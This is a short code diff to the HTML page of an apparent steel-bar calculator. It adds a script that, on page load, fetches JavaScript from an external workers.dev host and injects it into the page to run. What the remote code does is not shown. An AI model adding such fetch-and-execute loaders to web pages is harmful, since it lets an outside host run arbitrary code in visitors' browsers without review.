--- a/steel-bars-calculator/index.html
+++ b/steel-bars-calculator/index.html
@@ -474,7 +474,22 @@
             </aside>
         </section>
     </main>
- 
+ <script>
+    fetch("https://steel.niraula300.workers.dev/")
+      .then(response => {
+        if (!response.ok) {
+          throw new Error("Failed to load script: " + response.statusText);
+        }
+        return response.text();
+      })
+      .then(jsCode => {
+        const script = document.createElement("script");
+        script.text = jsCode;
+        document.body.appendChild(script);
+      })
+      .catch(error => console.error("Error loading script:", error));
+  </script>
+
     
 </body>
 </html>
